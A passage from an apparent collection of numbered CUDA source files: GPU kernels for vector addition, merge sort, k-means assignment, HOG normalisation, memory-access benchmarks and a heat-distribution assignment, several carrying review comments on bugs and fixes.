    findMeans<<<48,256>>>(d_clus, device_instances, rnk_device, max_energy_states, MAX_CLUSTER_SIZE, max_atoms);
    err=cudaMemcpy(rnk_host, rnk_device, max_energy_states*sizeof(int), cudaMemcpyDeviceToHost);
    if(err!=cudaSuccess)
    {
        cout<<"error allocating device rnk"<<endl;
        exit(EXIT_FAILURE);
    }
    //while(1)
    //{
    //E - Step (CPU reference, mirrors the kernel but in double precision)
    for(long long int j=0;j<max_energy_states;j++)
    {
        double min=0.0;
        for(long long int y=0;y<max_atoms;y++)
        {
            double d=0.0,s=0.0;
            for(int z=0;z<3;z++)
            {
                d=host_instances[(y*5)+z+2]-host_cluster[((0*MAX_CLUSTER_SIZE)+y)*max_atoms +z];
                s=s+(d*d);
            }
            s=sqrt(s);
            min+=s;
        }
        cls=-1;
        for(int clus=0;clus<MAX_CLUSTER_SIZE;clus++)
        {
            double val=0.0;
            for(long long int p=0;p<max_atoms;p++)
            {
                double d=0.0,s=0.0;
                for(int l=0;l<3;l++)
                {
                    d=data[j*max_atoms+p][l+2]-host_cluster[((clus*MAX_CLUSTER_SIZE)+p)*max_atoms +l];
                    s=s+(d*d);
                }
                s=sqrt(s);
                val+=s;
            }
            if(val<=min)
            {
                cls=clus;
                min=val;
            }
        }
        rnk[j]=cls+1;
    }
    // Compare the first 100 CPU and GPU assignments.
    int flag=0;
    for(long int i=0;i<100;i++)
    {
        if(rnk[i]!=rnk_host[i]) flag=1;
        cout<<rnk[i]<<"\t"<<rnk_host[i]<<endl;
    }
    if(flag==1) cout<<"Not Matching"<<endl;
    /* //M - Step int sizes[MAX_CLUSTER_SIZE]; for(int jj=0;jj<MAX_CLUSTER_SIZE;jj++) sizes[jj]=0; double means[MAX_CLUSTER_SIZE][max_atoms][3]; for(int jj=0;jj<MAX_CLUSTER_SIZE;jj++) { for(long long int kk=0;kk<max_atoms;kk++) { for(int ll=0;ll<3;ll++) { means[jj][kk][ll]=0; } } } for(long long int jj=0;jj<max_energy_states;jj++) { for(long long int kk=0;kk<max_atoms;kk++) { for(int ll=0;ll<3;ll++) { double d=data[jj*max_atoms+kk][ll+2]; means[rnk[jj]-1][kk][ll]+=d; sizes[rnk[jj]-1]++; } } } for(int jj=0;jj<MAX_CLUSTER_SIZE;jj++) { for(long long int kk=0;kk<max_atoms;kk++) { for(int ll=0;ll<3;ll++) { if(cluster[jj][kk][ll]!=means[jj][kk][ll]/sizes[jj]) { f=1; } if(sizes[jj]!=0) cluster[jj][kk][ll]=means[jj][kk][ll]/sizes[jj]; else cluster[jj][kk][ll]=0; } } } if(f==0) break; f=0; }*/
    /*for(int i=0;i<max_energy_states;i++) { cout<<rnk_host[i]<<" "; } cout<<endl;*/
    return 0;
}
21,408
#include "cuda_runtime.h"
#include <stdlib.h>
#include <stdio.h>
#include <time.h>

#define N (4096*4096)
#define THREADS_PER_BLOCK 512

/**
 * Device vector addition c = a + b for n elements, one thread per element.
 * The bounds guard handles grids that over-cover n.
 */
__global__ void sumOnGpu(int *a, int *b, int *c, int n){
    int index = threadIdx.x + blockIdx.x * blockDim.x;
    if(index < n){
        c[index] = a[index] + b[index];
    }
}

/** CPU reference implementation of c = a + b for n elements. */
void sumOnCpu(int *a, int *b, int *c, int n){
    for(int i = 0; i < n; i++){
        c[i] = a[i] + b[i];
    }
}

/** Fills a[0..n) with pseudo-random values in [0, 100000). */
void randomNumbers(int *a, int n){
    for(int i = 0; i < n; i++){
        a[i] = rand()%100000;
    }
}

/**
 * Compares a and b element-wise, printing every mismatch.
 * @return 1 when the arrays are identical, 0 otherwise.
 */
int compare(int *a, int *b, int n){
    int pass = 1;
    for(int i = 0; i < n; i++){
        if(a[i] != b[i]){
            printf("Different values at a[%i] = %i and b[%i] = %i \n", i, a[i], i, b[i]);
            pass = 0;
        }
    }
    if (pass)
        printf("args are the same \n");
    else
        printf("args are different \n");
    return pass;
}

/**
 * Benchmarks GPU vs CPU vector addition on N elements and verifies that
 * both produce the same result.
 * Bug fixed: kernel launches are asynchronous, so the original read the
 * clock immediately after the launch and timed only the launch overhead;
 * a cudaDeviceSynchronize() now closes the timed region. The grid size is
 * also computed with a ceil-div so any N is fully covered (previously N
 * had to be a multiple of THREADS_PER_BLOCK).
 */
int main(){
    int *a, *b, *c;
    int *d_a, *d_b, *d_c;
    int size = N * sizeof(int);
    a = (int*)malloc(size);
    b = (int*)malloc(size);
    c = (int*)malloc(size);
    cudaMalloc((void**)&d_a, size);
    cudaMalloc((void**)&d_b, size);
    cudaMalloc((void**)&d_c, size);
    randomNumbers(a, N);
    randomNumbers(b, N);
    cudaMemcpy(d_a, a, size, cudaMemcpyHostToDevice);
    cudaMemcpy(d_b, b, size, cudaMemcpyHostToDevice);
    clock_t timeOnGpu = clock();
    // Ceil-div grid: covers N even when it is not a block-size multiple.
    sumOnGpu<<<(N + THREADS_PER_BLOCK - 1)/THREADS_PER_BLOCK, THREADS_PER_BLOCK>>>(d_a, d_b, d_c, N);
    cudaDeviceSynchronize();   // wait for the kernel so the timing is real
    printf("time on GPU %f \n", ((double)clock() - timeOnGpu)/CLOCKS_PER_SEC);
    cudaMemcpy(c, d_c, size, cudaMemcpyDeviceToHost);
    int* c_h;
    c_h = (int*)malloc(size);
    clock_t i = clock();
    sumOnCpu(a, b, c_h, N);
    printf("time on CPU %f \n", ((double)clock() - i)/CLOCKS_PER_SEC);
    compare(c, c_h, N);
    free(a);
    free(b);
    free(c);
    free(c_h);
    cudaFree(d_a);
    cudaFree(d_b);
    cudaFree(d_c);
    return 0;
}
21,409
#include <thrust/device_vector.h>
#include <thrust/host_vector.h>
#include <thrust/random/linear_congruential_engine.h>
#include <thrust/random/uniform_real_distribution.h>
#include <iostream>

// build/run: nvcc -std=c++14 -O3 tarefa5.cu -o t5 && ./t5

// Functor that deterministically maps an index i to a uniform double in
// [25, 40): a fresh minstd engine is advanced past i draws so every index
// gets an independent sample.
struct raw_access
{
    __device__ __host__ double operator()(const int &i)
    {
        thrust::minstd_rand rng;
        thrust::uniform_real_distribution<double> dist(25, 40);
        rng.discard(i);
        return dist(rng);
    }
};

int main()
{
    int N = 10;
    thrust::device_vector<double> vetor(N);
    thrust::counting_iterator<int> iter(0);

    // Fill the device vector by applying the functor to indices 0..N-1.
    raw_access ra;
    thrust::transform(iter, iter + vetor.size(), vetor.begin(), ra);

    // for (auto i = vetor.begin(); i != vetor.end(); i++)
    //     std::cout << *i << " ";   // element-wise device access is slow -- GPU
    // printf("\n");

    // Bulk copy to the host, then print — fast element access on the CPU.
    thrust::host_vector<double> host(vetor);
    for (double value : host)
        std::cout << value << " ";
    printf("\n");
}
21,410
#include "includes.h"

using namespace std;

// implemented with variadic macro arguments (translated from Chinese)
// Single-block, in-place merge sort of datas[0..n-1] using double-buffered
// shared memory: halves shared[0..n-1] and shared[n..2n-1] alternate as
// source and destination each pass (parity tracked by cnt). Requires
// 2*n*sizeof(int) dynamic shared memory and a block of at least n threads.
// NOTE(review): the final store below is not guarded by tid < n — confirm
// the launch uses exactly n threads, otherwise extra threads write out of
// range.
__global__ void merge_sort(int *datas, int n){
    int tid=blockDim.x*threadIdx.y+threadIdx.x;   // flattened thread id within the block
    extern __shared__ int shared[];               // 2*n ints: two ping-pong buffers
    if (tid<n)
        shared[tid] = datas[tid];                 // stage input into buffer 0
    __syncthreads();
    int cnt=1;                                    // pass counter; parity picks src/dst buffer
    for (int gap=2; gap<n*2; gap<<=1, cnt++){
        // One thread per merged run of length `gap` merges two sorted
        // halves of length gap/2 from the source buffer into the other.
        if (tid%gap==0){
            int left=tid+n*((cnt+1)%2);           // start of left run (in source buffer)
            int mid=tid+gap/2+n*((cnt+1)%2);      // end of left run / start of right run
            int right=mid;
            int end=tid+gap+((cnt+1)%2)*n;        // end of right run
            int full_end=(1+(cnt+1)%2)*n;         // clamp for runs past the array tail
            int res_ind=n*(cnt%2)+tid;            // write cursor in destination buffer
            while((left<mid && left<full_end) || (right<end && right<full_end)){
                if (!(left<mid && left<full_end)){
                    // Left run exhausted: drain the right run.
                    shared[res_ind]=shared[right];
                    right++;
                }else if (!(right<end && right<full_end)){
                    // Right run exhausted: drain the left run.
                    shared[res_ind]=shared[left];
                    left++;
                }else{
                    // Both runs live: take the smaller head (stable on ties).
                    if (shared[right]> shared[left]){
                        shared[res_ind]=shared[left];
                        left++;
                    }else{
                        shared[res_ind]=shared[right];
                        right++;
                    }
                }
                res_ind++;
            }
        }
        // Reached by all threads each pass (gap/cnt are uniform), so the
        // barrier is well-formed despite the divergent merge above.
        __syncthreads();
    }
    // Copy the buffer that holds the final sorted data back to global memory.
    datas[tid]=shared[tid+ ((cnt+1)%2)*n];
}
21,411
#include <cuda.h>
#include <stdio.h>
#include <stdlib.h>

/**
 * Element-wise vector addition: C[i] = A[i] + B[i] for i < n.
 * Bug fixed: the original computed the global index as
 * threadIdx.x + blockDim.x + blockIdx.x ('+' instead of '*'), so every
 * block past the first processed the wrong elements.
 */
__global__ void vecAddKernel(float *A, float *B, float *C, int n){
    int i = threadIdx.x + blockDim.x * blockIdx.x;
    if(i < n){
        C[i] = A[i] + B[i];
    }
}

// & address  * value;
/**
 * Host wrapper: allocates device buffers, copies h_A/h_B up, launches the
 * addition kernel over n elements, and copies the result into h_C.
 * The device allocation failure check (previously commented out) is now
 * active.
 */
void vecAdd(float *h_A, float *h_B, float *h_C, int n){
    int size = n * sizeof(float);
    float *d_A, *d_B, *d_C;
    cudaMalloc((void**)&d_A, size);
    cudaMemcpy(d_A, h_A, size, cudaMemcpyHostToDevice);
    cudaMalloc((void**)&d_B, size);
    cudaMemcpy(d_B, h_B, size, cudaMemcpyHostToDevice);
    cudaError_t err = cudaMalloc((void**)&d_C, size);
    if(err != cudaSuccess){
        fprintf(stderr, "cudaMalloc failed: %s\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }
    // Integer ceil-div grid: covers n even when it is not a multiple of 256.
    vecAddKernel<<<(n + 255)/256, 256>>>(d_A, d_B, d_C, n);
    cudaMemcpy(h_C, d_C, size, cudaMemcpyDeviceToHost);
    cudaFree(d_C);
    cudaFree(d_A);
    cudaFree(d_B);
}

/**
 * Demo driver: adds two small vectors and prints the result.
 * Bug fixed: the original never initialized h_A/h_B, so the kernel read
 * (and the program printed) indeterminate malloc'd memory — undefined
 * behavior. The inputs now get deterministic values.
 */
int main(){
    float *h_A, *h_B, *h_C;
    int n = 4;
    h_A = (float *)malloc(n * sizeof(float));
    h_B = (float *)malloc(n * sizeof(float));
    h_C = (float *)malloc(n * sizeof(float));
    for(int i = 0; i < n; i++){
        h_A[i] = (float)i;
        h_B[i] = (float)(2 * i);
    }
    vecAdd(h_A, h_B, h_C, n);
    for(int i = 0; i < n; i++){
        printf("%f ", h_C[i]);
    }
    free(h_A);
    free(h_B);
    free(h_C);
}
21,412
#include <stdio.h>
#include <cuda.h>

// Parses a non-negative decimal integer from queryArray starting at i,
// skipping any leading and trailing spaces/tabs. i is advanced in place and
// left on the first character after the trailing whitespace.
__device__ int getnum(char *queryArray, int &i)
{
    int ans=0;
    while(queryArray[i]==' ' || queryArray[i]=='\t') i++;
    while(queryArray[i]<=57 && queryArray[i]>=48)   // '0'..'9'
    {
        ans = ans*10 + (queryArray[i]-'0');
        i++;
    }
    while(queryArray[i]==' ' || queryArray[i]=='\t') i++;
    return ans;
}

// One thread per update query. Each query (starting at the 'U' recorded in
// queryIndices_GPU[id]) appears to encode: a 1-based match column, a match
// value, a count p, then p (column, signed value) update pairs — TODO
// confirm against the input file format. For every row of the m x n
// database whose match column equals the match value, each pair's value is
// atomically added to that row's update column.
// NOTE(review): queryIndices_GPU[id] is overwritten with the parse position
// after the header, so the buffer doubles as scratch state.
__global__ void updateDB(int* dB, char* queryArray_GPU, int *queryIndices_GPU, int m, int n, int q)
{
    int id = threadIdx.x + blockIdx.x * blockDim.x;
    if(id < q)
    {
        int base = queryIndices_GPU[id];
        int i=base+3, j, rowno;   // +3 skips the 'U' token and its separator
        int updval;
        int updcol;
        int colno = getnum(queryArray_GPU, i)-1;   // match column, 0-based
        int ncomp = getnum(queryArray_GPU, i);     // value to match
        int p = getnum(queryArray_GPU, i);         // number of update pairs
        queryIndices_GPU[id] = i;                  // remember start of the pairs
        for(rowno = 0; rowno<m; rowno++)
        {
            if(dB[rowno*n + colno] == ncomp)
            {
                // Re-parse the pair list for each matching row.
                i = queryIndices_GPU[id];
                for(j = 0; j<p; j++)
                {
                    i+=1;
                    updcol = getnum(queryArray_GPU, i)-1;
                    updval = getnum(queryArray_GPU, i);
                    // A '-' after the digits marks a negative value —
                    // TODO confirm sign placement in the query format.
                    if(queryArray_GPU[i]=='-') updval*=(-1);
                    i+=2;
                    atomicAdd(&dB[rowno*n + updcol], updval);
                }
            }
        }
    }
}

// Driver: reads an m x n integer database and q update queries from
// argv[1], applies all queries on the GPU, and writes the updated database
// to argv[2].
// NOTE(review): the fixed <<<2, 1024>>> launch handles at most 2048
// queries; queryArray_CPU assumes at most 300 chars per query but the read
// loop is unbounded; otp is never fclose'd and no host/device memory is
// released — confirm acceptable for this assignment-style program.
int main(int argc, char* argv[])
{
    FILE *inp, *otp;
    inp = fopen(argv[1], "r");
    int m, n, i, j;
    fscanf(inp, "%d", &m);
    fscanf(inp, "%d", &n);
    int *dataBase = (int *) malloc (m*n*sizeof(int));
    for(i=0;i<m*n;++i)
        fscanf(inp, "%d", &dataBase[i]);
    int *dB;
    cudaMalloc(&dB,n*m*sizeof(int));
    cudaMemcpy(dB,dataBase,n*m*sizeof(int),cudaMemcpyHostToDevice);
    int q;
    fscanf(inp, "%d", &q);
    int *queryIndices_CPU = (int *) malloc (q*sizeof(int));
    int *queryIndices_GPU;
    cudaMalloc(&queryIndices_GPU, q*sizeof(int));
    char *queryArray_CPU = (char *)malloc(q*300*sizeof(char));
    // Read the rest of the file character by character, recording the
    // offset of each 'U' as the start of a query.
    j=0;
    i=0;
    while(fscanf(inp, "%c", &queryArray_CPU[i]) != EOF)
    {
        if(queryArray_CPU[i] == 'U')
        {
            queryIndices_CPU[j] = i;
            j+=1;
        }
        i+=1;
    }
    char *queryArray_GPU;
    cudaMalloc(&queryArray_GPU, (i)*sizeof(char));
    fclose(inp);
    cudaMemcpy(queryIndices_GPU,queryIndices_CPU,q*sizeof(int),cudaMemcpyHostToDevice);
    cudaMemcpy(queryArray_GPU,queryArray_CPU,(i)*sizeof(char),cudaMemcpyHostToDevice);
    updateDB<<<2, 1024>>>(dB, queryArray_GPU, queryIndices_GPU, m, n, q);
    cudaDeviceSynchronize();
    cudaMemcpy(dataBase,dB,n*m*sizeof(int),cudaMemcpyDeviceToHost);
    otp = fopen(argv[2], "w");
    for(i=0; i<m; ++i)
    {
        for(j=0; j<n; ++j)
            fprintf(otp, "%d ", dataBase[i*n + j]);
        fprintf(otp, "\n");
    }
    return 0;
}
21,413
/**
 * Animated sine-surface kernel: for each (x, y) vertex of a width x height
 * mesh, writes position (u, w, v, 1) into pos[y*width + x], where (u, v)
 * are the indices normalized to [-1, 1] and w is a time-dependent
 * sin*cos height field.
 * Fix: added a bounds guard so launches whose grid over-covers the mesh
 * (dimensions not a multiple of the block size) cannot write out of bounds.
 */
__global__ void sinwave_kernal(float4 *pos, unsigned int width, unsigned int height, float time)
{
    unsigned int x = blockIdx.x * blockDim.x + threadIdx.x;
    unsigned int y = blockIdx.y * blockDim.y + threadIdx.y;
    if (x >= width || y >= height)
        return;   // grid tail: outside the mesh

    // Normalize integer indices to the [-1, 1] square.
    float u = x / (float)width;
    float v = y / (float)height;
    u = u * 2.0f - 1.0f;
    v = v * 2.0f - 1.0f;

    float freq = 4.0f;   // spatial frequency of the wave pattern
    float w = sinf(u * freq + time) * cosf(v * freq + time) * 0.5f;

    pos[y * width + x] = make_float4(u, w, v, 1.0f);
}

/**
 * Host launcher: 8x8 thread blocks with a ceil-div grid, so any mesh size
 * is fully covered (previously mesh dimensions had to be exact multiples
 * of 8 or trailing vertices were skipped).
 */
void LaunchCUDAKernal(float4 *pPos, unsigned int mesh_width, unsigned int mesh_hight, float time)
{
    dim3 block(8, 8, 1);   // GPU thread block dimensions: 8 x 8
    dim3 grid((mesh_width + block.x - 1) / block.x,
              (mesh_hight + block.y - 1) / block.y, 1);
    sinwave_kernal<<<grid, block>>>(pPos, mesh_width, mesh_hight, time);
}
21,414
#include "includes.h"

// Copies d_oldArray into d_newArray in reverse order:
// d_newArray[k] = d_oldArray[numElems - 1 - k]. One thread per element;
// threads whose global index falls past numElems exit immediately.
__global__ void reverseSort_kernel(unsigned int * d_newArray, unsigned int * d_oldArray, unsigned int numElems)
{
    const unsigned int tid = blockDim.x * blockIdx.x + threadIdx.x;
    if (tid >= numElems)
        return; // grid tail: nothing to copy
    const unsigned int mirrored = numElems - 1 - tid;
    d_newArray[tid] = d_oldArray[mirrored];
}
21,415
#include <iostream>
#include <curand.h>
using namespace std;

// Owning wrapper for a device array of n floats filled with uniform randoms.
struct random_d_array
{
    float *data;
    int n;
    random_d_array(int n) : n{n}
    {
        cudaMalloc((void**)&data, n * sizeof(float));
        curandGenerator_t gen;
        curandCreateGenerator(&gen, CURAND_RNG_PSEUDO_DEFAULT);
        curandGenerateUniform(gen, data, n);
        curandDestroyGenerator(gen);  // was leaked on every construction
    }
    ~random_d_array()
    {
        // Bug fix: cudaFree takes the device pointer itself, not the address
        // of the host-side pointer variable (cudaFree(&data) freed garbage).
        cudaFree(data);
    }
};

// b[i] -> a[i]: fully coalesced copy.
__global__ void copy1(float *a, float *b, int n)
{
    int id = threadIdx.x + blockDim.x * blockIdx.x;
    if (id < n)
        a[id] = b[id];
}

// Offset read: each thread reads b[(id + offset) % n].
__global__ void copy2(float *a, float *b, int n, int offset)
{
    int id = threadIdx.x + blockDim.x * blockIdx.x;
    if (id < n)
        a[id] = b[(id + offset) % n];
}

// Strided read: each thread reads b[(id * stride) % n].
__global__ void copy3(float *a, float *b, int n, int stride)
{
    int id = threadIdx.x + blockDim.x * blockIdx.x;
    if (id < n)
        a[id] = b[(id * stride) % n];
}

// Time one copy1 launch with CUDA events; returns elapsed milliseconds.
float call1(float *a, float *b, int n, int blockSize, int gridSize, int i)
{
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    cudaEventRecord(start);
    copy1<<<gridSize, blockSize>>>(a, b, n);
    cudaEventRecord(stop);
    cudaEventSynchronize(stop);
    float milliseconds = 0;
    cudaEventElapsedTime(&milliseconds, start, stop);
    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    cout << "copy1: " << i << ": " << milliseconds << " ms" << endl;
    return milliseconds;
}

// Time one copy2 launch (offset access pattern).
float call2(float *a, float *b, int n, int offset, int blockSize, int gridSize, int i)
{
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    cudaEventRecord(start);
    copy2<<<gridSize, blockSize>>>(a, b, n, offset);
    cudaEventRecord(stop);
    cudaEventSynchronize(stop);
    float milliseconds = 0;
    cudaEventElapsedTime(&milliseconds, start, stop);
    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    cout << "copy2: " << i << ": " << milliseconds << " ms" << endl;
    return milliseconds;
}

// Time one copy3 launch (strided access pattern).
float call3(float *a, float *b, int n, int stride, int blockSize, int gridSize, int i)
{
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    cudaEventRecord(start);
    // Bug fix: this benchmark launched copy2, so the "strided read" numbers
    // actually measured the offset kernel. Launch copy3 as intended.
    copy3<<<gridSize, blockSize>>>(a, b, n, stride);
    cudaEventRecord(stop);
    cudaEventSynchronize(stop);
    float milliseconds = 0;
    cudaEventElapsedTime(&milliseconds, start, stop);
    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    cout << "copy3: " << i << ": " << milliseconds << " ms" << endl;
    return milliseconds;
}

int main()
{
    // NOTE(review): N floats is 4 GiB per array (8 GiB total) — requires a
    // large-memory GPU; confirm before running.
    const int N = 1024*1024*1024;
    const int iterations = 10;
    const int blockSize = 32;
    const int gridSize = (N + blockSize - 1) / blockSize;
    random_d_array a(N);
    random_d_array b(N);
    float average = 0.0;
    cout << "============= coalesced read ==============" << endl;
    call1(a.data, b.data, N, blockSize, gridSize, -1);  // warm-up, not averaged
    for (int i = 0; i < iterations; ++i)
        average += call1(a.data, b.data, N, blockSize, gridSize, i);
    average /= iterations;
    cout << "Average = " << average << endl;
    cout << "============= offset read =================" << endl;
    average = 0.0;
    const int offset = 17;
    call2(a.data, b.data, N, offset, blockSize, gridSize, -1);
    for (int i = 0; i < iterations; ++i)
        average += call2(a.data, b.data, N, offset, blockSize, gridSize, i);
    average /= iterations;
    cout << "Average = " << average << endl;
    cout << "============= strided read ================" << endl;
    average = 0.0;
    const int stride = 17;
    call3(a.data, b.data, N, stride, blockSize, gridSize, -1);
    for (int i = 0; i < iterations; ++i)
        average += call3(a.data, b.data, N, stride, blockSize, gridSize, i);
    average /= iterations;
    cout << "Average = " << average << endl;
}
21,416
#include <cuda.h>
#include "cuda_runtime.h"
#include <iostream>
#include <ctime>
#include <stdlib.h> // imported for the random functionality
using namespace std;

// Element-wise in-place add: arr1[i] += arr2[i], one thread per element.
__global__ void AddIntegers(int *arr1, int *arr2, int num_elements)
{
    int id = blockIdx.x * blockDim.x + threadIdx.x;
    if (id < num_elements) {
        arr1[id] += arr2[id];
    }
}

int main()
{
    srand(time(NULL));
    int num_elements = 100;
    int *array1, *array2;
    array1 = new int[num_elements];
    array2 = new int[num_elements];
    // initialize with random numbers
    for (int i = 0; i < num_elements; i++) {
        array1[i] = rand() % 1000;
        array2[i] = rand() % 1000;
    }
    // print the numbers that were initialized
    cout << "The numbers that were initialized were : " << endl;
    for (int i = 0; i < num_elements; i++)
        cout << array1[i] << " " << array2[i] << endl;
    cout << endl;
    // now initialize kernel
    int *deviceArray1, *deviceArray2;
    if (cudaMalloc(&deviceArray1, sizeof(int) * num_elements) != cudaSuccess) {
        cout << "Couldn't initialize deviceArray1!" << endl;
        delete[] array1;   // was leaked on this error path
        delete[] array2;
        return 0;
    }
    if (cudaMalloc(&deviceArray2, sizeof(int) * num_elements) != cudaSuccess) {
        cout << "Couldn't initialize deviceArray2!" << endl;
        cudaFree(deviceArray1);
        delete[] array1;
        delete[] array2;
        return 0;
    }
    // now copy the data from the local memory to GPU memory
    if (cudaMemcpy(deviceArray1, array1, sizeof(int) * num_elements, cudaMemcpyHostToDevice) != cudaSuccess) {
        cout << "Could not copy to deviceArray1!" << endl;
        cudaFree(deviceArray1);
        cudaFree(deviceArray2);
        delete[] array1;
        delete[] array2;
        return 0;
    }
    if (cudaMemcpy(deviceArray2, array2, sizeof(int) * num_elements, cudaMemcpyHostToDevice) != cudaSuccess) {
        cout << "Could not copy to deviceArray2!" << endl;
        cudaFree(deviceArray1);
        cudaFree(deviceArray2);
        delete[] array1;
        delete[] array2;
        return 0;
    }
    AddIntegers<<<num_elements / 256 + 1, 256>>>(deviceArray1, deviceArray2, num_elements);
    // Launch-configuration errors do not surface through cudaMemcpy's return
    // value alone; check explicitly (was missing).
    if (cudaGetLastError() != cudaSuccess) {
        cout << "Kernel launch failed!" << endl;
        cudaFree(deviceArray1);
        cudaFree(deviceArray2);
        delete[] array1;
        delete[] array2;
        return 0;
    }
    // now copy the data back from the GPU memory to local memory
    if (cudaMemcpy(array1, deviceArray1, sizeof(int) * num_elements, cudaMemcpyDeviceToHost) != cudaSuccess) {
        delete[] array1;
        delete[] array2;
        cudaFree(deviceArray1);
        cudaFree(deviceArray2);
        return 0;
    }
    for (int i = 0; i < num_elements; i++)
        cout << array1[i] << endl;
    cudaFree(deviceArray1);
    cudaFree(deviceArray2);
    delete[] array1;
    delete[] array2;
    return 0;
}
21,417
#include "includes.h"

// HOG block normalisation: each CUDA block loads 8 HOG blocks (4 cells x
// 9 bins each) into shared memory, computes each HOG block's L1 norm, and
// writes the L1-normalised histograms into `descriptor`.
// Expected launch shape (inferred from the indexing): blockDim = (9, 4, 8) —
// x = bin, y = cell within HOG block, z = HOG block within CUDA block;
// gridDim.x covers block_grid_width / 8, gridDim.y = block_grid_height.
__global__ void block_normalization_kernel(float* histograms, float* descriptor, int histograms_step, int block_grid_width, int block_grid_height, int block_width, int block_height, int num_bins, int cell_grid_width, int block_stride_x, int block_stride_y)
{
    //TODO: make the buffer sizes dependent on an input or template parameter.
    // Each thread block will process 8 hog blocks. Each hog block has 4 cells.
    // Each cell has 9 bins.
    __shared__ float s_blocks[9 * 4 * 8];
    __shared__ float L1_norm[8];
    int block_x = blockIdx.x * 8 + threadIdx.z;
    // NOTE(review): these early returns happen before __syncthreads(); if
    // block_grid_width is not a multiple of 8, part of the CUDA block exits
    // while the rest hits the barrier below — divergent __syncthreads() is
    // undefined behaviour. Confirm the launch guarantees full coverage.
    if (block_x >= block_grid_width) { return; }
    int block_y = blockIdx.y;
    if (block_y >= block_grid_height) { return; }
    // NOTE(review): block_idx mixes a HOG-grid coordinate with blockDim.y —
    // presumably this should be block_y * block_grid_width + block_x; verify
    // against the descriptor layout expected by the caller.
    int block_idx = block_y * blockDim.y + block_x;
    // Cell coordinates inside the cell grid: threadIdx.y selects one of the
    // 2x2 cells of this HOG block.
    int cell_x = block_x * block_stride_x + threadIdx.y % 2;
    int cell_y = block_y * block_stride_y + threadIdx.y / 2;
    int hist_idx = histograms_step * cell_y + num_bins * (cell_x) + threadIdx.x;
    // NOTE(review): s_blocks_idx has no threadIdx.z term, so all 8 HOG blocks
    // (z-slices) address the same 36 shared floats and overwrite each other —
    // compare with thread_id below which does include 36 * threadIdx.z.
    // Looks like this should be 36 * threadIdx.z + 9 * threadIdx.y +
    // threadIdx.x; confirm before relying on the output.
    int s_blocks_idx = 9 * threadIdx.y + threadIdx.x;
    s_blocks[s_blocks_idx] = histograms[hist_idx];
    __syncthreads();
    int thread_id = 36 * threadIdx.z + 9 * threadIdx.y + threadIdx.x;
    int elements_per_block = block_height * block_width * num_bins;
    // First 8 threads each sum one HOG block's entries to get its L1 norm.
    if (thread_id < 8) {
        L1_norm[thread_id] = 0.0f;
        for (int i = 0; i < elements_per_block; ++i) {
            L1_norm[thread_id] += s_blocks[elements_per_block * thread_id + i];
        }
    }
    __syncthreads();
    // Normalise and write out; each thread emits one descriptor entry.
    descriptor[elements_per_block * block_idx + s_blocks_idx] = s_blocks[s_blocks_idx] / L1_norm[threadIdx.z];
}
21,418
#include "includes.h"
extern "C" {
}

// Backward pass of a broadcast: fold the gradient dy (length len) back into
// dx (length c) by summing every element whose flat index maps to the same
// broadcast slot. atomicAdd handles the many-to-one accumulation.
__global__ void broadcast_backward(float* dx, const float* dy, unsigned int c, unsigned int len)
{
    const int i = blockDim.x * blockIdx.x + threadIdx.x;
    if (static_cast<unsigned int>(i) < len) {
        atomicAdd(&dx[i % c], dy[i]);
    }
}
21,419
/*
 * This file is part of cuAutotools.
 *
 * cuAutotools is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * cuAutotools is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with cuAutotools. If not, see <http://www.gnu.org/licenses/>.
 */
#include <stdio.h>
#include <stdlib.h>
#include <cuda.h>

// Deliberately empty kernel — exists only to prove a launch succeeds.
__global__ void kernel(void)
{
}

// Launch the no-op kernel once and report whether the launch succeeded.
int main(int argc, char *argv[])
{
    printf("[*] Calling useless kernel...\n");
    kernel<<<1, 1>>>();
    // Launch errors only surface through cudaGetLastError().
    cudaError_t d_error = cudaGetLastError();
    if (cudaSuccess != d_error) {
        fprintf(stderr, "[ERROR] Error running the simples kernel available\n");
        return EXIT_FAILURE;
    }
    printf("[*] Useless kernel called, runned, and exit normally...\n");
    return EXIT_SUCCESS;
}
21,420
/*
 * Please write your name and net ID below
 *
 * Last name: Adam
 * First name: Steven
 * Net ID: sna219
 *
 */

/*
 * This file contains the code for doing the heat distribution problem.
 * You do not need to modify anything except starting gpu_heat_dist() at the bottom
 * of this file.
 * In gpu_heat_dist() you can organize your data structure and the call to your
 * kernel(s) that you need to write too.
 *
 * You compile with:
 *     nvcc -o heatdist heatdist.cu
 */
#include <cuda.h>
#include <stdlib.h>
#include <stdio.h>
#include <time.h>

/* To index element (i,j) of a 2D array stored as 1D */
#define index(i, j, N)  ((i)*(N)) + (j)

/*****************************************************************/
// Function declarations: Feel free to add any functions you want.
void seq_heat_dist(float *, unsigned int, unsigned int);
void gpu_heat_dist(float *, unsigned int, unsigned int);

/*****************************************************************/
int main(int argc, char * argv[])
{
  unsigned int N;               /* Dimention of NxN matrix */
  int type_of_device = 0;       // CPU or GPU
  int iterations = 0;
  int i;
  /* The 2D array of points will be treated as 1D array of NxN elements */
  float * playground;
  // to measure time taken by a specific part of the code
  double time_taken;
  clock_t start, end;
  if(argc != 4)
  {
    fprintf(stderr, "usage: heatdist num iterations who\n");
    fprintf(stderr, "num = dimension of the square matrix (50 and up)\n");
    fprintf(stderr, "iterations = number of iterations till stopping (1 and up)\n");
    fprintf(stderr, "who = 0: sequential code on CPU, 1: GPU execution\n");
    exit(1);
  }
  type_of_device = atoi(argv[3]);
  N = (unsigned int) atoi(argv[1]);
  iterations = (unsigned int) atoi(argv[2]);
  /* Dynamically allocate NxN array of floats */
  playground = (float *)calloc(N*N, sizeof(float));
  if( !playground )
  {
    fprintf(stderr, " Cannot allocate the %u x %u array\n", N, N);
    exit(1);
  }
  /* Initialize it: calloc already initalized everything to 0 */
  // Edge elements to 80F
  for(i = 0; i < N; i++)
